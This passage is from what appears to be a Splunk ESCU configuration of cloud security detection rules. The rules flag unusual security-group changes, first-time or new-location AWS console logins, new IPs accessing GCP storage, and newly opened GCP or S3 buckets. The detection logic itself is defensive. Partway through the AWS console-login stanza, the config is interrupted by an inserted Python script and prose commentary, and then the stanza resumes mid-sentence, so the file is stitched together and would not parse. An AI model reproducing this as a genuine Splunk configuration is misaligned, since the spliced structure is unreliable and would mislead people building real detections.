`drop_dm_object_name("All_Changes")` | iplocation src | where isnotnull(Region) | 
lookup previously_seen_cloud_provisioning_activity_sources Region as Region OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenRegion=min(firstTimeSeen) | where isnull(firstTimeSeenRegion) OR firstTimeSeenRegion > relative_time(now(), `previously_unseen_cloud_provisioning_activity_window`) | table firstTime, src, Region, user, object, command | `cloud_provisioning_activity_from_previously_unseen_region_filter` | `security_content_ctime(firstTime)` [ESCU - Cloud Security Groups Modifications by User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies users who are modifying an unusual number of security groups in your cloud environment, focusing on create, modify, and delete actions performed by each user over 30-minute intervals. Analyzing patterns of modifications to security groups can help in identifying anomalous behavior that may indicate a compromised account or an insider threat.\ The detection calculates, for each user, the mean and standard deviation of the number of distinct security groups changed per 30-minute bucket and leverages the 3-sigma statistical rule to flag buckets with an unusual number of changes. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. This logic can be used for real time security monitoring as well as threat hunting exercises.\ This detection only considers user and service accounts that have created, modified, or deleted a security group.\ The fields returned by the analytic allow analysts to investigate the event further by providing fields like source IP and the values of the security objects affected. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1578.005"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic identifies users who are modifying an unusual number of security groups in your cloud environment, focusing on create, modify, and delete actions performed by each user over 30-minute intervals. Analyzing patterns of modifications to security groups can help in identifying anomalous behavior that may indicate a compromised account or an insider threat.\ The detection calculates, for each user, the mean and standard deviation of the number of distinct security groups changed per 30-minute bucket and leverages the 3-sigma statistical rule to flag buckets with an unusual number of changes. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. This logic can be used for real time security monitoring as well as threat hunting exercises.\ This detection only considers user and service accounts that have created, modified, or deleted a security group.\ The fields returned by the analytic allow analysts to investigate the event further by providing fields like source IP and the values of the security objects affected. action.escu.how_to_implement = This search requires cloud infrastructure logs such as AWS CloudTrail, GCP Pub/Sub message logs, and Azure audit logs to be ingested into an accelerated Change data model. It is also recommended that users try different combinations of the `bucket` span time and outlier conditions to better suit their environment. 
action.escu.known_false_positives = It is possible that a legitimate user or administrator may modify a number of security groups. action.escu.creation_date = 2024-02-21 action.escu.modification_date = 2024-02-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Security Groups Modifications by User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud User Activities"] action.risk = 1 action.risk.param._risk_message = Unusual number of cloud security group modifications detected by user - $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Cloud Security Groups Modifications by User - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud User Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1578.005"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats dc(All_Changes.object) as unique_security_groups values(All_Changes.src) as src values(All_Changes.user_type) as user_type values(All_Changes.object_category) as object_category values(All_Changes.object) as objects values(All_Changes.action) as action values(All_Changes.user_agent) as user_agent values(All_Changes.command) as command from datamodel=Change WHERE All_Changes.object_category = "security_group" (All_Changes.action = modified OR All_Changes.action = deleted OR 
All_Changes.action = created) by All_Changes.user _time span=30m | `drop_dm_object_name("All_Changes")` | eventstats avg(unique_security_groups) as avg_changes , stdev(unique_security_groups) as std_changes by user | eval upperBound=(avg_changes+std_changes*3) | eval isOutlier=if(unique_security_groups > 2 and unique_security_groups >= upperBound, 1, 0) | where isOutlier=1| `cloud_security_groups_modifications_by_user_filter` [ESCU - Detect AWS Console Login by New User - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1552"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. 
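The statistical logic of the Cloud Security Groups Modifications by User search, run over constructed events as an added example (a Python stand-in; not code from this file or from the Splunk Threat Research Team). It buckets security-group create/modify/delete events per user into 30-minute spans, counts distinct groups per bucket, and flags a bucket when the count exceeds 2 and is at or above the user's mean plus three sample standard deviations, which is what `eventstats avg/stdev` and the `upperBound` eval compute. The events, user names and timestamps are constructed.

```python
"""Per-user 3-sigma outlier detection over 30-minute buckets (added example, not ESCU code).

Python stand-in for the "Cloud Security Groups Modifications by User" SPL; all events are constructed.
"""
from collections import defaultdict
from statistics import mean, stdev

SPAN = 30 * 60   # `_time span=30m`
SIGMA = 3.0
MIN_GROUPS = 2   # `unique_security_groups > 2`: ignore tiny buckets even when they are statistical outliers


def bucket(ts, span=SPAN):
    """Floor a timestamp to the start of its bucket, as `_time span=30m` does."""
    return ts - ts % span


def distinct_groups_per_bucket(events):
    """dc(object) by user and 30m bucket, restricted to create/modify/delete on security groups."""
    seen = defaultdict(set)
    for ev in events:
        if ev["object_category"] != "security_group" or ev["action"] not in ("created", "modified", "deleted"):
            continue
        seen[(ev["user"], bucket(ev["_time"]))].add(ev["object"])
    return {k: len(v) for k, v in seen.items()}


def find_outliers(events, sigma=SIGMA):
    """Return (user, bucket_start, unique_groups, upper_bound) for every bucket flagged as an outlier."""
    counts = distinct_groups_per_bucket(events)
    per_user = defaultdict(list)
    for (user, _), n in counts.items():
        per_user[user].append(n)
    outliers = []
    for (user, start), n in sorted(counts.items()):
        values = per_user[user]
        avg = mean(values)
        std = stdev(values) if len(values) > 1 else 0.0  # Splunk stdev() is the sample standard deviation
        upper = avg + sigma * std                         # the `upperBound` field
        if n > MIN_GROUPS and n >= upper:
            outliers.append((user, start, n, round(upper, 3)))
    return outliers


def sample_events():
    """Constructed Change-model events spanning ten hours; not real CloudTrail data."""
    base = bucket(1_700_000_000)
    events = []
    for i in range(20):
        t = base + i * SPAN
        # bob: modifies the same single group every half hour (steady, never an outlier)
        events.append({"_time": t, "user": "bob", "object": "sg-bob", "action": "modified", "object_category": "security_group"})
        # alice: one or two groups per bucket, except a burst of twelve distinct groups in bucket 15
        n = 12 if i == 15 else (1 if i % 2 == 0 else 2)
        for g in range(n):
            events.append({"_time": t + g, "user": "alice", "object": f"sg-{i}-{g}", "action": "created", "object_category": "security_group"})
    # noise the search filters out: a non-security-group change and a read-only action
    events.append({"_time": base, "user": "alice", "object": "i-0", "action": "created", "object_category": "instance"})
    events.append({"_time": base, "user": "alice", "object": "sg-x", "action": "read", "object_category": "security_group"})
    return events


if __name__ == "__main__":
    for user, start, n, upper in find_outliers(sample_events()):
        print(f"{user}: {n} distinct security groups in bucket {start} (upperBound {upper})")
```

Because `eventstats` computes each user's mean and standard deviation over the same search window that contains the spike, the spike inflates its own threshold. A single spike among n buckets can never exceed (n-1)/sqrt(n) sample standard deviations, so with fewer than 11 buckets per user the 3-sigma rule cannot fire at all; the 60-minute dispatch window in this stanza yields only two 30-minute buckets, so the search needs a longer lookback (or per-user statistics computed from a separate baseline lookup) before it can produce results.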
The alert is fired if the user has logged into the console for the first time within the last hour. action.escu.how_to_implement = You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. action.escu.known_false_positives = When a legitimate new user logs in for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate. action.escu.creation_date = 2022-05-10 action.escu.modification_date = 2022-05-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect AWS Console Login by New User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect AWS Console Login by New User - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1552"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% 
counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user | `drop_dm_object_name(Authentication)` | join user type=outer [ | inputlookup previously_seen_users_console_logins | stats min(firstTime) as earliestseen by user] | eval userStatus=if(earliestseen >= relative_time(now(), "-24h@h") OR isnull(earliestseen), "First Time Logging into AWS Console", "Previously Seen User") | where userStatus="First Time Logging into AWS Console" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_aws_console_login_by_new_user_filter` [ESCU - Detect AWS Console Login by User from New City - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the city of the login, resolved from the source IP with `iplocation`, to a lookup file of the cities from which previously seen users (by ARN values) have logged into the console. The alert is fired if the user has logged into the console from a city not previously seen for that user. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1535"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the city of the login, resolved from the source IP with `iplocation`, to a lookup file of the cities from which previously seen users (by ARN values) have logged into the console. The alert is fired if the user has logged into the console from a city not previously seen for that user. 
action.escu.how_to_implement = You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in AWS CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in AWS CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. You can also provide additional filtering for this search by customizing the `detect_aws_console_login_by_user_from_new_city_filter` macro. action.escu.known_false_positives = When a legitimate user logs in for the first time from a new city, this activity will be detected. Check how old the account is and verify that the user activity is legitimate. action.escu.creation_date = 2022-08-25 action.escu.modification_date = 2022-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect AWS Console Login by User from New City - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious AWS Login Activities", "Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover", "Compromised User Account"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect AWS Console Login by User from New City - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS Login Activities", "Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover", "Compromised User 
Account"], "cis20": ["CIS 10"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1535"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user Authentication.src | iplocation Authentication.src | `drop_dm_object_name(Authentication)` | rename City as justSeenCity | table firstTime lastTime user justSeenCity | join user justSeenCity type=outer [| inputlookup previously_seen_users_console_logins | rename City as justSeenCity | stats min(firstTime) AS earliestseen by user justSeenCity | fields earliestseen user justSeenCity] | eval userCity=if(earliestseen >= relative_time(now(), "-24h@h") OR isnull(earliestseen), "New City","Previously Seen City") | where userCity = "New City" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime lastTime user justSeenCity userCity | `detect_aws_console_login_by_user_from_new_city_filter` [ESCU - Detect AWS Console Login by User from New Country - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the country of the login, resolved from the source IP with `iplocation`, to a lookup file of the countries from which previously seen users (by ARN values) have logged into the console. The alert is fired if the user has logged into the console from a country not previously seen for that user. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1535"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the country of the login, resolved from the source IP with `iplocation`, to a lookup file of the countries from which previously seen users (by ARN values) have logged into the console. The alert is fired if the user has logged into the console from a country not previously seen for that user. action.escu.how_to_implement = You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in AWS CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in AWS CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. You can also provide additional filtering for this search by customizing the `detect_aws_console_login_by_user_from_new_country_filter` macro. action.escu.known_false_positives = When a legitimate user logs in for the first time from a new country, this activity will be detected. Check how old the account is and verify that the user activity is legitimate. 
action.escu.creation_date = 2022-08-25
action.escu.modification_date = 2022-08-25
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect AWS Console Login by User from New Country - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Suspicious AWS Login Activities", "Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover", "Compromised User Account"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect AWS Console Login by User from New Country - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS Login Activities", "Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1535"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user Authentication.src | iplocation Authentication.src | `drop_dm_object_name(Authentication)` | rename Country as justSeenCountry | table firstTime lastTime user justSeenCountry | join user type=outer [| inputlookup previously_seen_users_console_logins | rename Country as previouslySeenCountry | stats min(firstTime) AS earliestseen by user previouslySeenCountry | fields earliestseen user previouslySeenCountry] | eval userCountry=if(firstTime >= relative_time(now(), "-24h@h"), "New Country","Previously Seen Country") | where userCountry = "New Country" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime lastTime user previouslySeenCountry justSeenCountry userCountry | `detect_aws_console_login_by_user_from_new_country_filter`

[ESCU - Detect AWS Console Login by User from New Region - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1535"], "nist": ["DE.AE"]}
action.escu.data_models = ["Authentication"]
action.escu.eli5 = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour
action.escu.how_to_implement = You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in AWS CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in AWS CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. You can also provide additional filtering for this search by customizing the `detect_aws_console_login_by_user_from_new_region_filter` macro.
action.escu.known_false_positives = When a legitimate new user logs in for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate.
action.escu.creation_date = 2022-08-25
action.escu.modification_date = 2022-08-25
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect AWS Console Login by User from New Region - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Suspicious AWS Login Activities", "Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover", "Compromised User Account"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect AWS Console Login by User from New Region - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS Login Activities", "Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1535"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user Authentication.src | iplocation Authentication.src | `drop_dm_object_name(Authentication)` | rename Region as justSeenRegion | table firstTime lastTime user justSeenRegion | join user type=outer [| inputlookup previously_seen_users_console_logins | rename Region as previouslySeenRegion | stats min(firstTime) AS earliestseen by user previouslySeenRegion | fields earliestseen user previouslySeenRegion] | eval userRegion=if(firstTime >= relative_time(now(), "-24h@h"), "New Region","Previously Seen Region") | where userRegion= "New Region" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime lastTime user previouslySeenRegion justSeenRegion userRegion | `detect_aws_console_login_by_user_from_new_region_filter`

[ESCU - Detect GCP Storage access from a new IP - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks at GCP Storage bucket-access logs and detects new or previously unseen remote IP addresses that have successfully accessed a GCP Storage bucket.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks at GCP Storage bucket-access logs and detects new or previously unseen remote IP addresses that have successfully accessed a GCP Storage bucket.
action.escu.how_to_implement = This search relies on the Splunk Add-on for Google Cloud Platform, setting up a Cloud Pub/Sub input, along with the relevant GCP PubSub topics and logging sink to capture GCP Storage Bucket events (https://cloud.google.com/logging/docs/routing/overview). In order to capture public GCP Storage Bucket access logs, you must also enable storage bucket logging to your PubSub Topic as per https://cloud.google.com/storage/docs/access-logs. These logs are deposited into the nominated Storage Bucket on an hourly basis and typically show up by 15 minutes past the hour. It is recommended to configure any saved searches or correlation searches in Enterprise Security to run on an hourly basis at 30 minutes past the hour (cron definition of 30 * * * *). A lookup table (previously_seen_gcp_storage_access_from_remote_ip.csv) stores the previously seen access requests, and is used by this search to determine any newly seen IP addresses accessing the Storage Buckets.
action.escu.known_false_positives = GCP Storage buckets can be accessed from any IP (if the ACLs are open to allow it), as long as it can make a successful connection. This will be a false positive, since the search is looking for a new IP within the past two hours.
action.escu.creation_date = 2020-08-10
action.escu.modification_date = 2020-08-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect GCP Storage access from a new IP - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"]
action.escu.analytic_story = ["Suspicious GCP Storage Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"threat_object_field": "remote_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Detect GCP Storage access from a new IP - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious GCP Storage Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `google_gcp_pubsub_message` | multikv | rename sc_status_ as status | rename cs_object_ as bucket_name | rename c_ip_ as remote_ip | rename cs_uri_ as request_uri | rename cs_method_ as operation | search status="\"200\"" | stats earliest(_time) as firstTime latest(_time) as lastTime by bucket_name remote_ip operation request_uri | table firstTime, lastTime, bucket_name, remote_ip, operation, request_uri | inputlookup append=t previously_seen_gcp_storage_access_from_remote_ip | stats min(firstTime) as firstTime, max(lastTime) as lastTime by bucket_name remote_ip operation request_uri | outputlookup previously_seen_gcp_storage_access_from_remote_ip | eval newIP=if(firstTime >= relative_time(now(),"-70m@m"), 1, 0) | where newIP=1 | eval first_time=strftime(firstTime,"%m/%d/%y %H:%M:%S") | eval last_time=strftime(lastTime,"%m/%d/%y %H:%M:%S") | table first_time last_time bucket_name remote_ip operation request_uri | `detect_gcp_storage_access_from_a_new_ip_filter`

[ESCU - Detect New Open GCP Storage Buckets - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for GCP PubSub events where a user has created an open/public GCP Storage bucket.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.CM"]}
action.escu.data_models = ["Email"]
action.escu.eli5 = This search looks for GCP PubSub events where a user has created an open/public GCP Storage bucket.
action.escu.how_to_implement = This search relies on the Splunk Add-on for Google Cloud Platform, setting up a Cloud Pub/Sub input, along with the relevant GCP PubSub topics and logging sink to capture GCP Storage Bucket events (https://cloud.google.com/logging/docs/routing/overview).
action.escu.known_false_positives = While this search has no known false positives, it is possible that a GCP admin has legitimately created a public bucket for a specific purpose. That said, GCP strongly advises against granting full control to the "allUsers" group.
action.escu.creation_date = 2020-08-05
action.escu.modification_date = 2020-08-05
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect New Open GCP Storage Buckets - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"]
action.escu.analytic_story = ["Suspicious GCP Storage Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Detect New Open GCP Storage Buckets - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious GCP Storage Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for GCP PubSub events where a user has created an open/public GCP Storage bucket.
action.notable.param.rule_title = Detect New Open GCP Storage Buckets
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `google_gcp_pubsub_message` data.resource.type=gcs_bucket data.protoPayload.methodName=storage.setIamPermissions | spath output=action path=data.protoPayload.serviceData.policyDelta.bindingDeltas{}.action | spath output=user path=data.protoPayload.authenticationInfo.principalEmail | spath output=location path=data.protoPayload.resourceLocation.currentLocations{} | spath output=src path=data.protoPayload.requestMetadata.callerIp | spath output=bucketName path=data.protoPayload.resourceName | spath output=role path=data.protoPayload.serviceData.policyDelta.bindingDeltas{}.role | spath output=member path=data.protoPayload.serviceData.policyDelta.bindingDeltas{}.member | search (member=allUsers AND action=ADD) | table _time, bucketName, src, user, location, action, role, member | search `detect_new_open_gcp_storage_buckets_filter`

[ESCU - Detect New Open S3 buckets - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for AWS CloudTrail events where a user has created an open/public S3 bucket.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events where a user has created an open/public S3 bucket.
action.escu.how_to_implement = You must install the AWS App for Splunk.
action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately created a public bucket for a specific purpose. That said, AWS strongly advises against granting full control to the "All Users" group.
action.escu.creation_date = 2021-07-19
action.escu.modification_date = 2021-07-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect New Open S3 buckets - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Suspicious AWS S3 Activities"]
action.risk = 1
action.risk.param._risk_message = User $user_arn$ has created an open/public bucket $bucketName$ with the following permissions $permission$
action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 48}, {"risk_object_field": "bucketName", "risk_object_type": "other", "risk_score": 48}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect New Open S3 buckets - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS S3 Activities"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for AWS CloudTrail events where a user has created an open/public S3 bucket.
action.notable.param.rule_title = Detect New Open S3 buckets
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventSource=s3.amazonaws.com eventName=PutBucketAcl | rex field=_raw "(?<json_field>{.+})" | spath input=json_field output=grantees path=requestParameters.AccessControlPolicy.AccessControlList.Grant{} | search grantees=* | mvexpand grantees | spath input=grantees output=uri path=Grantee.URI | spath input=grantees output=permission path=Permission | search uri IN ("http://acs.amazonaws.com/groups/global/AllUsers","http://acs.amazonaws.com/groups/global/AuthenticatedUsers") | search permission IN ("READ","READ_ACP","WRITE","WRITE_ACP","FULL_CONTROL") | rename requestParameters.bucketName AS bucketName | stats count min(_time) as firstTime max(_time) as lastTime by user_arn userIdentity.principalId userAgent uri permission bucketName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_new_open_s3_buckets_filter`

